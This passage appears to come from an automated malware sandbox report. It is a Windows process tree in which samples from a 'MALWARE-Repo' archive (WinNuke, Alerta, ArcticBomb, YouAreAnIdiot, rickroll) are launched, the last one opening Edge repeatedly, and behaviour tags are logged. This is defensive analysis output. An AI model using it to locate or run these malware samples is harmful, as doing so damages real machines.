  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=97 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11084 /prefetch:1
  2⤵
  PID:412
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=98 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:1
  2⤵
  PID:4264
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=99 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7032 /prefetch:1
  2⤵
  PID:2392
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=100 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2536 /prefetch:1
  2⤵
  PID:6908
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=101 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9952 /prefetch:1
  2⤵
  PID:7064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=102 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1244 /prefetch:1
  2⤵
  PID:4624
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=103 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11068 /prefetch:1
  2⤵
  PID:1396
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=104 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10608 /prefetch:1
  2⤵
  PID:4496
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=105 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10460 /prefetch:1
  2⤵
  PID:6884
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=106 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6544 /prefetch:1
  2⤵
  PID:6376
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=107 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9480 /prefetch:1
  2⤵
  PID:6356
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=108 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:1
  2⤵
  PID:6644
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=109 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10352 /prefetch:1
  2⤵
  PID:1256
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=110 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10572 /prefetch:1
  2⤵
  PID:6568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=111 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8960 /prefetch:1
  2⤵
  PID:6968
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=112 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10740 /prefetch:1
  2⤵
  PID:6756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=113 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11504 /prefetch:1
  2⤵
  PID:5180
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=114 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11300 /prefetch:1
  2⤵
  PID:5616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=115 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11852 /prefetch:1
  2⤵
  PID:6292
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=116 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9796 /prefetch:1
  2⤵
  PID:6600
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,2975204294767127273,6698213204429547118,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=117 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11468 /prefetch:1
  2⤵
  PID:5528

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3044

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4468

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:4628

C:\Windows\System32\oobe\UserOOBEBroker.exe
C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
1⤵
- Drops file in Windows directory
PID:2036

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
1⤵
PID:1800

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5860

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004CC 0x00000000000004DC
1⤵
PID:4220

C:\Program Files (x86)\Windows Media Player\wmplayer.exe
"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Play -Embedding
1⤵
PID:5320
- C:\Program Files (x86)\Windows Media Player\setup_wm.exe
  "C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Play -Embedding
  2⤵
  PID:5376
- - C:\Windows\SysWOW64\unregmp2.exe
    C:\Windows\system32\unregmp2.exe /ShowWMP /SetShowState /CreateMediaLibrary
    3⤵
    PID:3900
  - - C:\Windows\system32\unregmp2.exe
      "C:\Windows\SysNative\unregmp2.exe" /ShowWMP /SetShowState /CreateMediaLibrary /REENTRANT
      4⤵
      Modifies Installed Components in the registry
      Drops desktop.ini file(s)
      Modifies registry class
      PID:756
- - C:\Program Files (x86)\Windows Media Player\wmplayer.exe
    "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Relaunch /Play C:\Users\Admin\Desktop\PublishWatch.wmx
    3⤵
    - Enumerates connected drives
    - Suspicious use of AdjustPrivilegeToken
    PID:1584
- C:\Windows\SysWOW64\unregmp2.exe
  "C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
  2⤵
  PID:5396
- - C:\Windows\system32\unregmp2.exe
    "C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
    3⤵
    - Enumerates connected drives
    - Suspicious use of AdjustPrivilegeToken
    PID:1396

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost
1⤵
- Drops file in Windows directory
PID:5432

C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Virus\WinNuke.98.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Virus\WinNuke.98.exe"
1⤵
PID:1040

C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Trojan\Alerta.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Trojan\Alerta.exe"
1⤵
PID:3356

C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Trojan\ArcticBomb.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Trojan\ArcticBomb.exe"
1⤵
PID:3268

C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Joke\YouAreAnIdiot\EXEVersion\YouAreAnIdiot.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Joke\YouAreAnIdiot\EXEVersion\YouAreAnIdiot.exe"
1⤵
PID:1152
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1152 -s 1232
  2⤵
  - Program crash
  PID:4520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1152 -ip 1152
1⤵
PID:3476

C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Joke\rickroll.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Joke\rickroll.exe"
1⤵
PID:5196
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=dQw4w9WgXcQ
  2⤵
  PID:4872
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffcaceb3cb8,0x7ffcaceb3cc8,0x7ffcaceb3cd8
    3⤵
    PID:4824
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=dQw4w9WgXcQ
  2⤵
  PID:920
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffcaceb3cb8,0x7ffcaceb3cc8,0x7ffcaceb3cd8
    3⤵
    PID:6216
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=dQw4w9WgXcQ
  2⤵
  PID:5592
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffcaceb3cb8,0x7ffcaceb3cc8,0x7ffcaceb3cd8
    3⤵
    PID:6176
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=dQw4w9WgXcQ
  2⤵
  PID:4004
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffcaceb3cb8,0x7ffcaceb3cc8,0x7ffcaceb3cd8
    3⤵
    PID:1592
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=dQw4w9WgXcQ
  2⤵
  PID:6740
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffcaceb3cb8,0x7ffcaceb3cc8,0x7ffcaceb3cd8
    3⤵
    PID:4940
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=dQw4w9WgXcQ
  2⤵
  PID:6680
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffcaceb3cb8,0x7ffcaceb3cc8,0x7ffcaceb3cd8
    3⤵
    PID:2056
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=dQw4w9WgXcQ
  2⤵
  PID:5052
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffcaceb3cb8,0x7ffcaceb3cc8,0x7ffcaceb3cd8
    3⤵
    PID:2220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=dQw4w9WgXcQ
  2⤵
  PID:2544
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffcaceb3cb8,0x7ffcaceb3cc8,0x7ffcaceb3cd8
    3⤵
    PID:1944
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=dQw4w9WgXcQ
  2⤵
  PID:4624
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xdc,0x12c,0x7ffcaceb3cb8,0x7ffcaceb3cc8,0x7ffcaceb3cd8
    3⤵
    PID:6484
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=dQw4w9WgXcQ
  2⤵
  PID:1132
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0x100,0x12c,0x7ffcaceb3cb8,0x7ffcaceb3cc8,0x7ffcaceb3cd8
    3⤵
    PID:3540
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=dQw4w9WgXcQ
  2⤵
  PID:5104
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcaceb3cb8,0x7ffcaceb3cc8,0x7ffcaceb3cd8
    3⤵
    PID:2132
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=dQw4w9WgXcQ
  2⤵
  PID:5144
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffcaceb3cb8,0x7ffcaceb3cc8,0x7ffcaceb3cd8
    3⤵
    PID:2284
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=dQw4w9WgXcQ
  2⤵
  PID:6656
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffcaceb3cb8,0x7ffcaceb3cc8,0x7ffcaceb3cd8
    3⤵
    PID:3216
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=dQw4w9WgXcQ
  2⤵
  PID:1440
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffcaceb3cb8,0x7ffcaceb3cc8,0x7ffcaceb3cd8
    3⤵
    PID:3088
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=dQw4w9WgXcQ
